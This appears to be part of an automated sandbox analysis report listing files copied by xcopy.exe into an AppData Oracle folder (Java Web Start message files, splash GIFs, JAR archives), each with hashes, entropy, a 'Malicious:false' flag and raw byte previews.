                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\uB0B4\uBD80 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. \uC54C \uC218 \uC5C6\uB294 \uBA54\uC2DC\uC9C0\uC785\uB2C8\uB2E4..error.badinst.nojre=\uC124\uCE58\uAC00 \uC798\uBABB\uB418\uC5C8\uC2B5\uB2C8\uB2E4. \uAD6C\uC131 \uD30C\uC77C\uC5D0\uC11C JRE\uB97C \uCC3E\uC744 \uC218 \uC5C6\uC2B5\uB2C8\uB2E4..error.launch.execv=Java Web Start(execv)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4..error.launch.sysexec=Java Web Start(SysExec)\uB97C \uD638\uCD9C\uD558\uB294 \uC911 \uC624\uB958\uAC00 \uBC1C\uC0DD\uD588\uC2B5\uB2C8\uB2E4. .error.listener.failed=\uC2A4\uD50C\uB798\uC2DC: sysCreateListenerSocket\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4..error.accept.failed=\uC2A4\uD50C\uB798\uC2DC: \uC2B9\uC778\uC744 \uC2E4\uD328\uD588\uC2B5\uB2C8\uB2E4..error.recv.failed=

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_pt_BR.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1319)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3285
                                                                                                                                                                                                                                  Entropy (8bit):4.837889715420947
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:R+OfaeLkDcUfLYgIYu9WvXx6K6GBxLy1gBne8u6K0NCMc6MTNTjtA7NZdlw7ZHAz:R1fybjfSIX8pGBxLy1Ba+mZdlw7Zs
                                                                                                                                                                                                                                  MD5:ED15A441A20EA85C29521A0C7C8C3097
                                                                                                                                                                                                                                  SHA1:24E4951743521AB9A11381C77BD0CDB1ED30F5B5
                                                                                                                                                                                                                                  SHA-256:4140663A49040FF191C07D2D04588402263EC2E1679A9A1A79B790A137EE7FB8
                                                                                                                                                                                                                                  SHA-512:BE5F0639DE6B0AC95792987D0AF83CA77495F7F49953698C8B18692DE982F77B68FE63159E8CD7537D62A71209A9FFABBECF046AD82D8341F613D39F180F9C83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2016, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=erro interno, mensagem desconhecida.error.badinst.nojre=Instala\u00E7\u00E3o incorreta. Nenhum JRE encontrado no arquivo de configura\u00E7\u00E3o.error.launch.execv=Erro encontrado ao chamar Java Web Start (execv).error.launch.sysexec=Erro encontrado ao chamar Java Web Start (SysExec) .error.listener.failed=Tela Inicial: falha em sysCreateListenerSocket.error.accept.failed=Tela Inicial: falha na fun\u00E7\u00E3o accept.error.recv.failed=Tela Inicial: falha na fun\u00E7\u00E3o recv.error.invalid.port=Tela Inicial: n\u00E3o reativou uma porta v\u00E1lida.error.read=Ler ap\u00F3s o final do buffer.error.xmlparsing=Erro durante o parsing de XML: tipo incorreto de token encontrado.error.splash.exit=Saindo do processamento da tela inicial do Java Web .....\n.# "Last WinSock Error" means the error message for the last op

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_sv.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1379)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3384
                                                                                                                                                                                                                                  Entropy (8bit):4.898189215756456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:U+L1Q6sQcqRo/hMsVsM4ogqxwvpvykU/2/7JCh91XlK7Q/v//Afr:UM1TsGkF/CzJA1KGXIr
                                                                                                                                                                                                                                  MD5:BF9652F69C3BE79D0972E860990CE375
                                                                                                                                                                                                                                  SHA1:BB5A4AA0BA499F6B1916A83E3C7922A4583B4ADB
                                                                                                                                                                                                                                  SHA-256:99D7F49ECD3109370C0C6E8F1230317F7BEA299EBBC811CA780028475E59B547
                                                                                                                                                                                                                                  SHA-512:61232DFB1D9B9D519EE9B000802286EF2708609EA847737477CA5F762DBBBA917ED958EF38D4F7AEAE45AB7ACF830FCCDB6915C1CE1C17662BAAA7722B843132
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2018, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=internt fel, ok\u00E4nt meddelande.error.badinst.nojre=Felaktig installation. Ingen JRE har hittats i konfigurationsfilen.error.launch.execv=Ett fel intr\u00E4ffade under starten av Java Web Start (execv).error.launch.sysexec=Ett fel intr\u00E4ffade under starten av Java Web Start (SysExec) .error.listener.failed=V\u00E4lkomstsk\u00E4rm: sysCreateListenerSocket utf\u00F6rdes inte.error.accept.failed=V\u00E4lkomstsk\u00E4rm: kunde inte accepteras.error.recv.failed=V\u00E4lkomstsk\u00E4rm: kunde inte mottaga.error.invalid.port=V\u00E4lkomstsk\u00E4rm: \u00E5terskapade inte en giltig port.error.read=L\u00E4ste f\u00F6rbi slutet av bufferten.error.xmlparsing=XML-tolkningsfel: fel typ av token hittades.error.splash.exit=Java Web Start - v\u00E4lkomstsk\u00E4rmen avslutas .....\n.# "Last WinSock Error" means the error me

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_CN.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1857)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4072
                                                                                                                                                                                                                                  Entropy (8bit):5.01527031899567
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Ln7OVgLO4c5tgvDgEY4tnf7OgdbywfK0eSm91js:3OVTjqvIwPtK1js
                                                                                                                                                                                                                                  MD5:E6F84C081895ACDFD98DA0F496E1DD3D
                                                                                                                                                                                                                                  SHA1:1C2B96673DDDD3596890EF4FC22017D484A1F652
                                                                                                                                                                                                                                  SHA-256:A1752A0175F490F61E0AAD46DC6887C19711F078309062D5260E164AC844F61A
                                                                                                                                                                                                                                  SHA-512:D4D28780147E22678CD8E7415CACFAD533AE5AF31D74426BBE4993F05A0707E4F0F71D948093FFA1A0D6EA48310E901CD0ED1C14E2FBDF69C92462D070A9664F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5185\u90E8\u9519\u8BEF, \u672A\u77E5\u6D88\u606F.error.badinst.nojre=\u9519\u8BEF\u5B89\u88C5\u3002\u914D\u7F6E\u6587\u4EF6\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u8C03\u7528 Java Web Start (execv) \u65F6\u9047\u5230\u9519\u8BEF.error.launch.sysexec=\u8C03\u7528 Java Web Start (SysExec) \u65F6\u9047\u5230\u9519\u8BEF.error.listener.failed=\u542F\u52A8\u5C4F\u5E55: sysCreateListenerSocket \u5931\u8D25.error.accept.failed=\u542F\u52A8\u5C4F\u5E55: \u63A5\u53D7\u5931\u8D25.error.recv.failed=\u542F\u52A8\u5C4F\u5E55: recv \u5931\u8D25.error.invalid.port=\u542F\u52A8\u5C4F\u5E55: \u672A\u6062\u590D\u6709\u6548\u7AEF\u53E3.error.read=\u8BFB\u53D6\u8D85\u51FA\u7F13\u51B2\u533A\u7ED3\u5C3E.error.xmlparsing=XML \u89E3\u6790\u9519\u8BEF: \u53D1\u73B0\u9519\u8BEF\u7684\u6807\u8BB0\u7C7B\u578B.error.splash.exit=Java

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_HK.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3752
                                                                                                                                                                                                                                  Entropy (8bit):5.14936903006307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zMWCQv8u9/IzdG/JvFWlHaQzWy/owZFomWdYQCfQ/ydQCyJ:gWCQv7VIxG/JodaQ7PoHWQaQ/6QCY
                                                                                                                                                                                                                                  MD5:880BAACB176553DEAB39EDBE4B74380D
                                                                                                                                                                                                                                  SHA1:37A57AAD121C14C25E149206179728FA62203BF0
                                                                                                                                                                                                                                  SHA-256:FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
                                                                                                                                                                                                                                  SHA-512:3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F.error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4.error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4.error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557.error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557.error.recv.failed=Splash: recv \u5931\u6557.error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9.error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E.error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E.error.splash.exit=Java Web Start \u9583\u73FE\u87A2\u5E55\u8655\u7

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\messages_zh_TW.properties

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1729)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3752
                                                                                                                                                                                                                                  Entropy (8bit):5.14936903006307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:zMWCQv8u9/IzdG/JvFWlHaQzWy/owZFomWdYQCfQ/ydQCyJ:gWCQv7VIxG/JodaQ7PoHWQaQ/6QCY
                                                                                                                                                                                                                                  MD5:880BAACB176553DEAB39EDBE4B74380D
                                                                                                                                                                                                                                  SHA1:37A57AAD121C14C25E149206179728FA62203BF0
                                                                                                                                                                                                                                  SHA-256:FF4A3A92BC92CB08D2C32C435810440FD264EDD63E56EFA39430E0240C835620
                                                                                                                                                                                                                                  SHA-512:3039315BB283198AF9090BD3D31CFAE68EE73BC2B118BBAE0B32812D4E3FD0F11CE962068D4A17B065DAB9A66EF651B9CB8404C0A2DEFCE74BB6B2D1D93646D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Copyright (c) 2004, 2013, Oracle and/or its affiliates. All rights reserved..# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms..#..error.internal.badmsg=\u5167\u90E8\u932F\u8AA4\uFF0C\u4E0D\u660E\u7684\u8A0A\u606F.error.badinst.nojre=\u5B89\u88DD\u932F\u8AA4\u3002\u5728\u7D44\u614B\u6A94\u4E2D\u627E\u4E0D\u5230 JRE.error.launch.execv=\u547C\u53EB Java Web Start (execv) \u6642\u9047\u5230\u932F\u8AA4.error.launch.sysexec=\u547C\u53EB Java Web Start (SysExec) \u6642\u9047\u5230\u932F\u8AA4.error.listener.failed=Splash: sysCreateListenerSocket \u5931\u6557.error.accept.failed=Splash: \u63A5\u53D7\u5931\u6557.error.recv.failed=Splash: recv \u5931\u6557.error.invalid.port=Splash: \u6709\u6548\u7684\u9023\u63A5\u57E0\u5C1A\u672A\u56DE\u5FA9.error.read=\u8B80\u53D6\u8D85\u51FA\u7DE9\u885D\u5340\u7D50\u5C3E.error.xmlparsing=XML \u5256\u6790\u932F\u8AA4: \u627E\u5230\u932F\u8AA4\u7684\u8A18\u865F\u7A2E\u985E.error.splash.exit=Java Web Start \u9583\u73FE\u87A2\u5E55\u8655\u7

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 320 x 139
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8590
                                                                                                                                                                                                                                  Entropy (8bit):7.910688771816331
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:91m4OqvVyG+LMIcBc2qPjHmxJCCG/h97dIYhOX:9/OqdivcqzjH3tfDE
                                                                                                                                                                                                                                  MD5:249053609EAF5B17DDD42149FC24C469
                                                                                                                                                                                                                                  SHA1:20E7AEC75F6D036D504277542E507EB7DC24AAE8
                                                                                                                                                                                                                                  SHA-256:113B01304EBBF3CC729A5CA3452DDA2093BD8B3DDC2BA29E5E1C1605661F90BE
                                                                                                                                                                                                                                  SHA-512:9C04A20E2FA70E4BCFAC729E366A0802F6F5167EA49475C2157C8E2741C4E4B8452D14C75F67906359C12F1514F9FB7E9AF8E736392AC8434F0A5811F7DDE0CB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a@................................................FFF...T..W..V..Is.Kv.W..W..U..Hr.P|.O{.Mx.Gq.Jt.Fo.Fp.V..U..Gp.T..Lw.P|.R..Q~.S..S..Nz.Lw.Hq.Ju.X..V..Lx.It.U..Hs.Ny.Nz.P}.R~.S..R~.R..Q}.Q}.My.Lv.It.O{.Ku.My.Oz.Gp.Gq.Hr.....................WWW.........Ry.uuu............i......ggg...]..................{..y..d..........Sz................s............i...............c............v.....X........r...........]........^........p.....z.........r..Y..l..m...............]................Mu........Qw.Nw.........v.....b..j.......V}.]........d.....k........v........Lu....S|.U{.Oy................W........Lv.U..R}.....Nv.Gp.Nx.Ks....Jr....Hq......V~.T..S~.Z.....Gq.O{.......W..Qz.......Lw.Z.....T...........S~....Lt.Kv....V.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash@2x.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 640 x 278
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15276
                                                                                                                                                                                                                                  Entropy (8bit):7.949850025334252
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:onqkbSDLFgIBL0IgyZCE/oIuuemXclVO/HemZ8GbRdziHm6tIclW3ZYvvebtssZn:lKMLWkpgy8sdsnOmEyPLaYoauAdI
                                                                                                                                                                                                                                  MD5:CB81FED291361D1DD745202659857B1B
                                                                                                                                                                                                                                  SHA1:0AE4A5BDA2A6D628FAC51462390B503C99509FDC
                                                                                                                                                                                                                                  SHA-256:9DD5CCD6BDFDAAD38F7D05A14661108E629FDD207FC7776268B566F7941E1435
                                                                                                                                                                                                                                  SHA-512:4A383107AC2D642F4EB63EE7E7E85A8E2F63C67B41CA55EBAE56B52CECFE8A301AAF14E6536553CBC3651519DB5C10FC66588C84C9840D496F5AE980EF2ED2B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a..............................................FFF...W..V..Is.Hr.W..W..U..P|.T..Kv.O{.V..Mx....S..Fp.Jt.Lw.Gp.Gq.Lw.U..T..R..Q~.Fo.Nz.R~.R..Q}.My.Ju.It.Oz.Gp.Nz.Gq.V..Ny.Hq.P|.P}.S..S..S..Q}.Ku.Ku.Hr.Lx.X..Mx.It.U..Is.Hs.T..O{.R~.T..O{.Kv.My.Lv..........i...........]..WWWu...........ggguuut.......................................Ry.......{..............b..........................^..l.................X}....a..{.....c..................v..m........T{.f.....l........X.........................j..U|...........`........j..g..U~........^.....Qz.Jr.Nw.p.....v.....p.....Gp....r..Mt.......y..q.....]..Nv............Tz.Y.....[.....Pw....Ox..............X.....Y..X..W..V..S|............Mx....Mv.Kt.U..Hq.Lv.W.....Mu.i..Q{.Gq.Lt.S~.T..U..Kv................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash_11-lic.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 320 x 139
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7805
                                                                                                                                                                                                                                  Entropy (8bit):7.877495465139721
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:S88k2wenvMs3iHrSI3yy73VWOcaJpGvrrXqJBcqgbf5bD0jmzDBoqCN2IWsyh:SFHhs73n73V4airrXq41Ll3vBmN2YU
                                                                                                                                                                                                                                  MD5:9E8F541E6CEBA93C12D272840CC555F8
                                                                                                                                                                                                                                  SHA1:8DEF364E07F40142822DF84B5BB4F50846CB5E4E
                                                                                                                                                                                                                                  SHA-256:C5578AC349105DE51C1E9109D22C7843AAB525C951E312700C73D5FD427281B9
                                                                                                                                                                                                                                  SHA-512:2AB06CAE68DEC9D92B66288466F24CC25505AF954FA038748D6F294D1CFFB72FCC7C07BA8928001D6C487D1BF71FE0AF1B1AA0F35120E5F6B1B2C209BA596CE2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a@...................................{...........c.....P|.l.....].............Ry.........S{.i.....U~........................uuuV..b........T.....WWW}..R~.......Hr.v..T|.It..........n.............e..f.....].........Hq.`........Y.....i..r.._..l...........]..Y.....v..................s..f.....z.....\........Jr.r.....................i..e.....p.....Y..m........Z..Sz.Ow....Y..Nx.{..w..Jr.T..R}....Pw.Lt.s..`..W..W..Lv...........................................FFF...W..V..Is.Kv.W..W..U..Hr.O{.Mx.Jt.Gq.Fp.Gp.Lw.Fo.U..T..Q~.R..P|.Lw.S..S..Ju.Nz.V..X..V..U..Ny.Hs.My.Ku.My.Q}.R~.P}.Q}.R..S..S..O{.Oz.Lx.Nz.Lv.It.Gp.Gq....ggg.....................S...............S|....Gp........Mw.S~.Px.Nz.Pz.......Lt.Kv.a.....V.....r.................Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\deploy\splash_11@2x-lic.gif

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 640 x 278
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12250
                                                                                                                                                                                                                                  Entropy (8bit):7.901446927123525
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Zzv4QPei/ueMFJ2M4xSGb/xGEyddpTa7Kv9I1BDc3KR3q6xmwJePYueHjAPZKGMr:5vTWvmxSGbkpTaYe1dc3KR3q7wJsOHmu
                                                                                                                                                                                                                                  MD5:3FE2013854A5BDAA488A6D7208D5DDD3
                                                                                                                                                                                                                                  SHA1:D2BFF9BBF7920CA743B81A0EE23B0719B4D057CA
                                                                                                                                                                                                                                  SHA-256:FC39D09D187739E580E47569556DE0D19AF28B53DF5372C7E0538FD26EDB7988
                                                                                                                                                                                                                                  SHA-512:E3048E8E0C22F6B200E5275477309083AA0435C0F33D1994C10CE65A52F357EE7CF7081F85C00876F438DFA1EE59B542D602287EC02EA340BFDF90C0C6ABD548
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:GIF89a.......{.....k......{...........P|.b..V......................Hr.Hq.......................]...........X...........f.............i............R~....u..It.u.....l..T~.......Qz.......^..Q~....i.......b.............Qx.Y..Y.....q..p.....v..............a..U|......T..Y........................^..n........f.....Tz.e..j..f..Ox.p..Y~.Ov.......y..Z..h.....l.....W.....w.....R|.p.....X~.a........Pw.Ks.Ir.......^.....Kt.FFF\........Ox...........W..U..Nw.Mu.W..V..Is.V..Hr.R~.W..W..U..T..O{.Kv.Gp.S..Mx.Lw.Fp.Lw.U..T..Jt.R..Gq.Fo.Ju.My.R..Q}.R~.Nz.Oz.It.Nz.V..V..Gp.Ny.Ku.P|.Ku.Gq.P}.S..Q}.S..S..Is.Lx.U..O{.Hs.T..O{.My.Mx.Kv.Lv............iii...YYY.............xxx........._.....U..Gp.U..Lv.Mw....Oz......S|.S}.Hq.\..Kv....Mv.P{.W..T........Mw.T.....Nz.q..Fo.......!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="ht

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\access-bridge-32.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):197117
                                                                                                                                                                                                                                  Entropy (8bit):7.792272631565105
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:6z8E+sJqq32wtQJr69+1vNmJqcv1KR5m3g/LPqM8USjfwK/+Sfu6hMEmJtooiN:V42bgEwv165mw/zB8jfx+6hMXmX
                                                                                                                                                                                                                                  MD5:DDF0062607C66277444DB65390969928
                                                                                                                                                                                                                                  SHA1:8012C383BD0FEBD9CF1FB59B3E18924D7AB5E507
                                                                                                                                                                                                                                  SHA-256:BB10E9B99CFB49BE68694B877457BC18C5112E24D41376B3A5ADC22C616ED27C
                                                                                                                                                                                                                                  SHA-512:E05A1D84398BED5BB83CF4E1AD37E2FFE8E494B0BDD61697934A35FCEA2034F0C7A1E3F0D1EB0BD78C25E8F9E7D35BEC4C3EB01CD11585CBDA75C95888B57624
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/......PK..............PK.........p.V................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.JM,IM.u........Y.*h..%&.*8.....%...k.r.r..PK......D...E...PK.........n.V............/...com/sun/java/accessibility/AccessBridge$1.class.S.n.@.=.........6.....BU.D.T..CQ.x.8+...F.u...$...>..B.....5.....9.gfg......St....,........sp....z*. ......".e........MG.|N..(...a.=..9!Tz.@..GJ.W./...s<..8&t.9...m......8..Jt.`..:....Q.?.a....H......y.$.Y..a.....m.c5...K.....'.....Y.`^.5..|..z_.q.*....]2p....[..P..b.A.C...W..j..(H3.....a.~...;.Z.^,.T...6QB..L.+g...%l_R....H.V..el&..#F.~6.1.9.C.g$M.+.vn..&........k 8 ...._..."G=.6P.#._@.o(}.........s`..Oy..A.Q&|...._a...c...2.....g$.+..k..:n.s7q..x....?PK....&.........PK.........n.V............0...com/sun/java/accessibility/AccessBridge$10.class.T[O.[....e`.. .7.j.v.. zT.R*h...c..a.SF..2........o..&.^..}.7...m....I....|.~....(nu.....$9....*L...i.......3.:0....#.9I.k..F.c*.U.U\bH,Ynz

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\cldrdata.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3861927
                                                                                                                                                                                                                                  Entropy (8bit):7.966923563095338
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:EkrHu5vfWwUesoIARg7oPA8HJMNdVdE9KW4hh6lyNkEex8Yg:EkrORUVqeoPAa6fnPygOFx5g
                                                                                                                                                                                                                                  MD5:66D182EB84391F8C7EEF9A880BA68CB5
                                                                                                                                                                                                                                  SHA1:F3CB80D60C2663E9430F5EC8AC7F21C3768E7960
                                                                                                                                                                                                                                  SHA-256:1499D65DF53BE5250956CC6B78BB7C2686F05BFF110C7117658DC35A73216D0F
                                                                                                                                                                                                                                  SHA-512:43BEC32B248ED8633BFCF5D7A21B43355C93222DF3FE11097A8A732145678922279E20243D5421F1532EAECD64C2A2C28C5A71E944C624B7F3FAAB7DF3EEB96F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:PK.........p.V................META-INF/......PK..............PK.........p.V................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.q.B........E..%.).N. e.z..F.....E..9....E..E.%@-..\.\.PK....kYO...[...PK.........n.V................sun/text/resources/cldr/aa/FormatData_aa.classmPMO.@.}........(.@..xB....!b,1i8..6X..I.5._.'.....(..".9.yy3.f?..?..`?...*6T.5l....aG......=...mqN.......t...:6g.;`^....d.L..\0.|.b...w&.....c.;...8%H...........RqA.......b. ..p./G......B0..K.Sx6...>4\....Zy.!..".R.N....T....=..c~d.7...3(5.<.....a;F....\....a8@..a.@..d^.]YV"k....U...2'#...rX.K...ue...O....bZ.:CB...jZ.]3...2M.s....3}.ct%.GV..PK...]..d.......PK.........n.V................sun/text/resources/cldr/af/FormatData_af.classuV.x[W.>...a[y......R.+-..K].I.4..(...b.=....a.h...({..B!...{.U......w../...y...?.;w>.u..w..A.......xE.nFxe.nAx...^.p+.k.^..z.7 ...M.oFx..[...v.3..!.....Bx7.{.nGx/....@x?...."..A..!|....G.>..1..#|....B......A.,...>..../"|...._A.*........o"|.....A..........."

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\lib\ext\dnsns.jar

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Java archive data (JAR)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8488
                                                                                                                                                                                                                                  Entropy (8bit):7.783962787395864
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:XgUXHrd3Qa/pj55oNQYnrKcwP1CCzwKRTed:Xg4HZH/pj55IecJH
                                                                                                                                                                                                                                  MD5:B545A5C415ED12A6912FE414F45FF00F
                                                                                                                                                                                                                                  SHA1:F00C703C6167E112C45B7358BB27EFCA0F0E4F6E
                                                                                                                                                                                                                                  SHA-256:A13E4D3707073C15138394CB6B7A8FDDADB6BB02CD60CBD4867496C8DD5B3663
                                                                                                                                                                                                                                  SHA-512:8A3A5431DC355946EAC1DDCAB11C4EC787BC0466EBE6DD4AFBB19F0CDCB3587C3BE76C502F2629AA4C793DA6A1C4C5EDF3A1B6F16A8C9E43DF5A92B3FE737B79
                                                                                                                                                                                                                                  Malicious:false
